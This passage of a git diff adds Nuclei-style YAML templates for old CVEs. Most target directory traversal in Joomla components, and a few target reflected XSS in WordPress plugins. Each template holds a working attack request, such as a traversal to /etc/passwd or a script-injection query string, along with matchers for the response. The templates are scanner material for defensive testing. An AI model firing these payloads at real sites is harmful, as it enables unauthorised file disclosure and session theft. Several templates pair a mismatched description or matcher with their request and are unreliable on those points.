+ - https://www.cvedetails.com/cve/CVE-2010-1653
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2010/CVE-2010-1658.yml b/cves/2010/CVE-2010-1658.yml
new file mode 100644
index 0000000000..6ddb4c7fcf
--- /dev/null
+++ b/cves/2010/CVE-2010-1658.yml
@@ -0,0 +1,27 @@
+id: CVE-2010-1658
+
+info:
+ name: Joomla! Component NoticeBoard 1.3 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the Code-Garage NoticeBoard (com_noticeboard) component 1.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
+ reference: |
+ - https://www.exploit-db.com/exploits/12427
+ - https://www.cvedetails.com/cve/CVE-2010-1658
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_noticeboard&controller=../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2010/CVE-2010-1715.yml b/cves/2010/CVE-2010-1715.yml
new file mode 100644
index 0000000000..46d27a2dc0
--- /dev/null
+++ b/cves/2010/CVE-2010-1715.yml
@@ -0,0 +1,27 @@
+id: CVE-2010-1715
+
+info:
+ name: Joomla! Component Online Exam 1.5.0 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the Online Examination (aka Online Exam or com_onlineexam) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. NOTE: some of these details are obtained from third party information.
+ reference: |
+ - https://www.exploit-db.com/exploits/12174
+ - https://www.cvedetails.com/cve/CVE-2010-1715
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2010/CVE-2010-1873.yml b/cves/2010/CVE-2010-1873.yml
new file mode 100644
index 0000000000..8be5d8b989
--- /dev/null
+++ b/cves/2010/CVE-2010-1873.yml
@@ -0,0 +1,27 @@
+id: CVE-2010-1873
+
+info:
+ name: Joomla! Component Jvehicles - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: SQL injection vulnerability in the Jvehicles (com_jvehicles) component 1.0, 2.0, and 2.1111 for Joomla! allows remote attackers to execute arbitrary SQL commands via the aid parameter in an agentlisting action to index.php. NOTE: some of these details are obtained from third party information.
+ reference: |
+ - https://www.exploit-db.com/exploits/11997
+ - https://www.cvedetails.com/cve/CVE-2010-1873
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_jvehicles&controller=../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2010/CVE-2010-1878.yml b/cves/2010/CVE-2010-1878.yml
new file mode 100644
index 0000000000..12459b34f7
--- /dev/null
+++ b/cves/2010/CVE-2010-1878.yml
@@ -0,0 +1,27 @@
+id: CVE-2010-1878
+
+info:
+ name: Joomla! Component OrgChart 1.0.0 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the OrgChart (com_orgchart) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+ reference: |
+ - https://www.exploit-db.com/exploits/12317
+ - https://www.cvedetails.com/cve/CVE-2010-1878
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2010/CVE-2010-1957.yml b/cves/2010/CVE-2010-1957.yml
new file mode 100644
index 0000000000..63a50e8224
--- /dev/null
+++ b/cves/2010/CVE-2010-1957.yml
@@ -0,0 +1,27 @@
+id: CVE-2010-1957
+
+info:
+ name: Joomla! Component Love Factory 1.3.4 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the Love Factory (com_lovefactory) component 1.3.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12235
+ - https://www.cvedetails.com/cve/CVE-2010-1957
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2010/CVE-2010-1977.yml b/cves/2010/CVE-2010-1977.yml
new file mode 100644
index 0000000000..71de2a9492
--- /dev/null
+++ b/cves/2010/CVE-2010-1977.yml
@@ -0,0 +1,27 @@
+id: CVE-2010-1977
+
+info:
+ name: Joomla! Component J!WHMCS Integrator 1.5.0 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the J!WHMCS Integrator (com_jwhmcs) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12083
+ - https://www.cvedetails.com/cve/CVE-2010-1977
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_jwhmcs&controller=../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2010/CVE-2010-1982.yml b/cves/2010/CVE-2010-1982.yml
new file mode 100644
index 0000000000..1ef0e13f14
--- /dev/null
+++ b/cves/2010/CVE-2010-1982.yml
@@ -0,0 +1,27 @@
+id: CVE-2010-1982
+
+info:
+ name: Joomla! Component JA Voice 2.0 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the JA Voice (com_javoice) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
+ reference: |
+ - https://www.exploit-db.com/exploits/12121
+ - https://www.cvedetails.com/cve/CVE-2010-1982
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2010/CVE-2010-2045.yml b/cves/2010/CVE-2010-2045.yml
new file mode 100644
index 0000000000..886f48ac65
--- /dev/null
+++ b/cves/2010/CVE-2010-2045.yml
@@ -0,0 +1,27 @@
+id: CVE-2010-2045
+
+info:
+ name: Joomla! Component FDione Form Wizard 1.0.2 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the Dione Form Wizard (aka FDione or com_dioneformwizard) component 1.0.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
+ reference: |
+ - https://www.exploit-db.com/exploits/12595
+ - https://www.cvedetails.com/cve/CVE-2010-2045
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_dioneformwizard&controller=[LFI]%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2010/CVE-2010-2050.yml b/cves/2010/CVE-2010-2050.yml
new file mode 100644
index 0000000000..9aedcbfc20
--- /dev/null
+++ b/cves/2010/CVE-2010-2050.yml
@@ -0,0 +1,27 @@
+id: CVE-2010-2050
+
+info:
+ name: Joomla! Component MS Comment 0.8.0b - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the Moron Solutions MS Comment (com_mscomment) component 0.8.0b for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+ reference: |
+ - https://www.exploit-db.com/exploits/12611
+ - https://www.cvedetails.com/cve/CVE-2010-2050
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2010/CVE-2010-2128.yml b/cves/2010/CVE-2010-2128.yml
new file mode 100644
index 0000000000..cf019f95a3
--- /dev/null
+++ b/cves/2010/CVE-2010-2128.yml
@@ -0,0 +1,27 @@
+id: CVE-2010-2128
+
+info:
+ name: Joomla! Component JE Quotation Form 1.0b1 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the JE Quotation Form (com_jequoteform) component 1.0b1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the view parameter to index.php.
+ reference: |
+ - https://www.exploit-db.com/exploits/12607
+ - https://www.cvedetails.com/cve/CVE-2010-2128
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_jequoteform&view=../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2010/CVE-2010-2507.yml b/cves/2010/CVE-2010-2507.yml
new file mode 100644
index 0000000000..4ff7972b09
--- /dev/null
+++ b/cves/2010/CVE-2010-2507.yml
@@ -0,0 +1,27 @@
+id: CVE-2010-2507
+
+info:
+ name: Joomla! Component Picasa2Gallery 1.2.8 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the Picasa2Gallery (com_picasa2gallery) component 1.2.8 and earlier for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
+ reference: |
+ - https://www.exploit-db.com/exploits/13981
+ - https://www.cvedetails.com/cve/CVE-2010-2507
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2010/CVE-2010-2680.yml b/cves/2010/CVE-2010-2680.yml
new file mode 100644
index 0000000000..6d1b76393a
--- /dev/null
+++ b/cves/2010/CVE-2010-2680.yml
@@ -0,0 +1,27 @@
+id: CVE-2010-2680
+
+info:
+ name: Joomla! Component jesectionfinder - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the JExtensions JE Section/Property Finder (jesectionfinder) component for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the view parameter to index.php.
+ reference: |
+ - https://www.exploit-db.com/exploits/14064
+ - https://www.cvedetails.com/cve/CVE-2010-2680
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/propertyfinder/component/jesectionfinder/?view=[LFI]"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2010/CVE-2010-2857.yml b/cves/2010/CVE-2010-2857.yml
new file mode 100644
index 0000000000..41f3443057
--- /dev/null
+++ b/cves/2010/CVE-2010-2857.yml
@@ -0,0 +1,27 @@
+id: CVE-2010-2857
+
+info:
+ name: Joomla! Component Music Manager - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the Music Manager component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the cid parameter to album.html.
+ reference: |
+ - https://www.exploit-db.com/exploits/14274
+ - https://www.cvedetails.com/cve/CVE-2010-2857
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/component/music/album.html?cid=[LFI]%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2010/CVE-2010-2918.yml b/cves/2010/CVE-2010-2918.yml
new file mode 100644
index 0000000000..6585591609
--- /dev/null
+++ b/cves/2010/CVE-2010-2918.yml
@@ -0,0 +1,27 @@
+id: CVE-2010-2918
+
+info:
+ name: Joomla! Component Visites 1.1 - MosConfig_absolute_path Remote File Inclusion
+ author: daffainfo
+ severity: high
+ description: PHP remote file inclusion vulnerability in core/include/myMailer.class.php in the Visites (com_joomla-visites) component 1.1 RC2 for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter.
+ reference: |
+ - https://www.exploit-db.com/exploits/31708
+ - https://www.cvedetails.com/cve/CVE-2010-2918
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=[evilcode]"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2010/CVE-2010-3203.yml b/cves/2010/CVE-2010-3203.yml
new file mode 100644
index 0000000000..7f5245195e
--- /dev/null
+++ b/cves/2010/CVE-2010-3203.yml
@@ -0,0 +1,27 @@
+id: CVE-2010-3203
+
+info:
+ name: Joomla! Component PicSell 1.0 - Local File Disclosure
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the PicSell (com_picsell) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dflink parameter in a prevsell dwnfree action to index.php.
+ reference: |
+ - https://www.exploit-db.com/exploits/14845
+ - https://www.cvedetails.com/cve/CVE-2010-3203
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2010/CVE-2010-4282.yml b/cves/2010/CVE-2010-4282.yml
new file mode 100644
index 0000000000..6b4f52c658
--- /dev/null
+++ b/cves/2010/CVE-2010-4282.yml
@@ -0,0 +1,27 @@
+id: CVE-2010-4282
+
+info:
+ name: phpShowtime 2.0 - Directory Traversal
+ author: daffainfo
+ severity: high
+ description: Multiple directory traversal vulnerabilities in Pandora FMS before 3.1.1 allow remote attackers to include and execute arbitrary local files via (1) the page parameter to ajax.php or (2) the id parameter to general/pandora_help.php, and allow remote attackers to include and execute, create, modify, or delete arbitrary local files via (3) the layout parameter to operation/agentes/networkmap.php.
+ reference: |
+ - https://www.exploit-db.com/exploits/15643
+ - https://www.cvedetails.com/cve/CVE-2010-4282
+ tags: cve,cve2010,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/pandora_console/ajax.php?page=../../../../../../etc/passwd"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2010/CVE-2010-4719.yml b/cves/2010/CVE-2010-4719.yml
new file mode 100644
index 0000000000..1d50e72775
--- /dev/null
+++ b/cves/2010/CVE-2010-4719.yml
@@ -0,0 +1,27 @@
+id: CVE-2010-4719
+
+info:
+ name: Joomla! Component JRadio - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in JRadio (com_jradio) component before 1.5.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
+ reference: |
+ - https://www.exploit-db.com/exploits/15749
+ - https://www.cvedetails.com/cve/CVE-2010-4719
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_jradio&controller=[LFI]%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2010/CVE-2010-4769.yml b/cves/2010/CVE-2010-4769.yml
new file mode 100644
index 0000000000..84aebb4c15
--- /dev/null
+++ b/cves/2010/CVE-2010-4769.yml
@@ -0,0 +1,27 @@
+id: CVE-2010-4769
+
+info:
+ name: Joomla! Component Jimtawl 1.0.2 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the Jimtawl (com_jimtawl) component 1.0.2 Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the task parameter to index.php.
+ reference: |
+ - https://www.exploit-db.com/exploits/15585
+ - https://www.cvedetails.com/cve/CVE-2010-4769
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2010/CVE-2010-4977.yml b/cves/2010/CVE-2010-4977.yml
new file mode 100644
index 0000000000..455e53f70c
--- /dev/null
+++ b/cves/2010/CVE-2010-4977.yml
@@ -0,0 +1,27 @@
+id: CVE-2010-4977
+
+info:
+ name: Joomla! Component Canteen 1.0 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: SQL injection vulnerability in menu.php in the Canteen (com_canteen) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the mealid parameter to index.php.
+ reference: |
+ - https://www.exploit-db.com/exploits/34250
+ - https://www.cvedetails.com/cve/CVE-2010-4977
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_canteen&controller=../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2010/CVE-2010-5028.yml b/cves/2010/CVE-2010-5028.yml
new file mode 100644
index 0000000000..c5a262e530
--- /dev/null
+++ b/cves/2010/CVE-2010-5028.yml
@@ -0,0 +1,27 @@
+id: CVE-2010-5028
+
+info:
+ name: Joomla! Component JE Job 1.0 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: SQL injection vulnerability in the JExtensions JE Job (com_jejob) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the catid parameter in an item action to index.php.
+ reference: |
+ - https://www.exploit-db.com/exploits/12601
+ - https://www.cvedetails.com/cve/CVE-2010-5028
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_jejob&view=../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2010/CVE-2010-5286.yml b/cves/2010/CVE-2010-5286.yml
new file mode 100644
index 0000000000..9657c736eb
--- /dev/null
+++ b/cves/2010/CVE-2010-5286.yml
@@ -0,0 +1,27 @@
+id: CVE-2010-5286
+
+info:
+ name: Joomla! Component Jstore - 'Controller' Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in Jstore (com_jstore) component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
+ reference: |
+ - https://www.exploit-db.com/exploits/34837
+ - https://www.cvedetails.com/cve/CVE-2010-5286
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_jstore&controller=./../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2011/CVE-2011-2744.yml b/cves/2011/CVE-2011-2744.yml
new file mode 100644
index 0000000000..a31bf3374a
--- /dev/null
+++ b/cves/2011/CVE-2011-2744.yml
@@ -0,0 +1,27 @@
+id: CVE-2011-2744
+
+info:
+ name: Chyrp 2.x - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in Chyrp 2.1 and earlier allows remote attackers to include and execute arbitrary local files via a ..%2F (encoded dot dot slash) in the action parameter to the default URI.
+ reference: |
+ - https://www.exploit-db.com/exploits/35945
+ - https://www.cvedetails.com/cve/CVE-2011-2744
+ tags: cve,cve2011,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2012/CVE-2012-0981.yml b/cves/2012/CVE-2012-0981.yml
new file mode 100644
index 0000000000..1fbd334ebd
--- /dev/null
+++ b/cves/2012/CVE-2012-0981.yml
@@ -0,0 +1,27 @@
+id: CVE-2012-0981
+
+info:
+ name: phpShowtime 2.0 - Directory Traversal
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in phpShowtime 2.0 allows remote attackers to list arbitrary directories and image files via a .. (dot dot) in the r parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/18435
+ - https://www.cvedetails.com/cve/CVE-2012-0981
+ tags: cve,cve2012,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?r=i/../../../../../etc/passwd"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2012/CVE-2012-0996.yml b/cves/2012/CVE-2012-0996.yml
new file mode 100644
index 0000000000..2b2b93c82d
--- /dev/null
+++ b/cves/2012/CVE-2012-0996.yml
@@ -0,0 +1,27 @@
+id: CVE-2012-0996
+
+info:
+ name: 11in1 CMS 1.2.1 - Local File Inclusion (LFI)
+ author: daffainfo
+ severity: high
+ description: Multiple directory traversal vulnerabilities in 11in1 1.2.1 stable 12-31-2011 allow remote attackers to read arbitrary files via a .. (dot dot) in the class parameter to (1) index.php or (2) admin/index.php.
+ reference: |
+ - https://www.exploit-db.com/exploits/36784
+ - https://www.cvedetails.com/cve/CVE-2012-0996
+ tags: cve,cve2012,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?class=../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2012/CVE-2012-1226.yml b/cves/2012/CVE-2012-1226.yml
new file mode 100644
index 0000000000..1e6131bf81
--- /dev/null
+++ b/cves/2012/CVE-2012-1226.yml
@@ -0,0 +1,27 @@
+id: CVE-2012-1226
+
+info:
+ name: Dolibarr ERP/CRM 3.2 Alpha - Multiple Directory Traversal Vulnerabilities
+ author: daffainfo
+ severity: high
+ description: Multiple directory traversal vulnerabilities in Dolibarr CMS 3.2.0 Alpha allow remote attackers to read arbitrary files and possibly execute arbitrary code via a .. (dot dot) in the (1) file parameter to document.php or (2) backtopage parameter in a create action to comm/action/fiche.php.
+ reference: |
+ - https://www.exploit-db.com/exploits/36873
+ - https://www.cvedetails.com/cve/CVE-2012-1226
+ tags: cve,cve2012,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/document.php?modulepart=project&file=../../../../../../../etc/passwd"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2014/CVE-2014-10037.yml b/cves/2014/CVE-2014-10037.yml
new file mode 100644
index 0000000000..45138ab312
--- /dev/null
+++ b/cves/2014/CVE-2014-10037.yml
@@ -0,0 +1,27 @@
+id: CVE-2014-10037
+
+info:
+ name: DomPHP 0.83 - Directory Traversal
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in DomPHP 0.83 and earlier allows remote attackers to have unspecified impact via a .. (dot dot) in the url parameter to photoalbum/index.php.
+ reference: |
+ - https://www.exploit-db.com/exploits/30865
+ - https://www.cvedetails.com/cve/CVE-2014-10037
+ tags: cve,cve2014,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/photoalbum/index.php?urlancien=&url=../../../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2014/CVE-2014-4539.yaml b/cves/2014/CVE-2014-4539.yaml
new file mode 100644
index 0000000000..a6154b13b5
--- /dev/null
+++ b/cves/2014/CVE-2014-4539.yaml
@@ -0,0 +1,31 @@
+id: CVE-2014-4539
+
+info:
+ name: Movies <= 0.6 - Unauthenticated Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ reference: |
+ - https://wpscan.com/vulnerability/d6ea4fe6-c486-415d-8f6d-57ea2f149304
+ - https://nvd.nist.gov/vuln/detail/CVE-2014-4539
+ tags: cve,cve2014,wordpress,wp-plugin,xss
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "'>"
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2014/CVE-2014-4550.yaml b/cves/2014/CVE-2014-4550.yaml
new file mode 100644
index 0000000000..50c6d4564c
--- /dev/null
+++ b/cves/2014/CVE-2014-4550.yaml
@@ -0,0 +1,31 @@
+id: CVE-2014-4550
+
+info:
+ name: Shortcode Ninja <= 1.4 - Unauthenticated Reflected XSS
+ author: daffainfo
+ severity: medium
+ reference: |
+ - https://wpscan.com/vulnerability/c7c24c7d-5341-43a6-abea-4a50fce9aab0
+ - https://nvd.nist.gov/vuln/detail/CVE-2014-4550
+ tags: cve,cve2014,wordpress,wp-plugin,xss
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/shortcode–ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "'>"
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2014/CVE-2014-4558.yaml b/cves/2014/CVE-2014-4558.yaml
new file mode 100644
index 0000000000..745d6d337e
--- /dev/null
+++ b/cves/2014/CVE-2014-4558.yaml
@@ -0,0 +1,31 @@
+id: CVE-2014-4558
+
+info:
+ name: WooCommerce Swipe <= 2.7.1 - Unauthenticated Reflected XSS
+ author: daffainfo
+ severity: medium
+ reference: |
+ - https://wpscan.com/vulnerability/37d7936a-165f-4c37-84a6-7ba5b59a0301
+ - https://nvd.nist.gov/vuln/detail/CVE-2014-4558
+ tags: cve,cve2014,wordpress,wp-plugin,xss
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/swipehq–payment–gateway–woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E "
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "'>"
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2014/CVE-2014-4561.yaml b/cves/2014/CVE-2014-4561.yaml
new file mode 100644
index 0000000000..81ce56467b
--- /dev/null
+++ b/cves/2014/CVE-2014-4561.yaml
@@ -0,0 +1,31 @@
+id: CVE-2014-4561
+
+info:
+ name: Ultimate Weather Plugin <= 1.0 - Unauthenticated Reflected XSS
+ author: daffainfo
+ severity: medium
+ reference: |
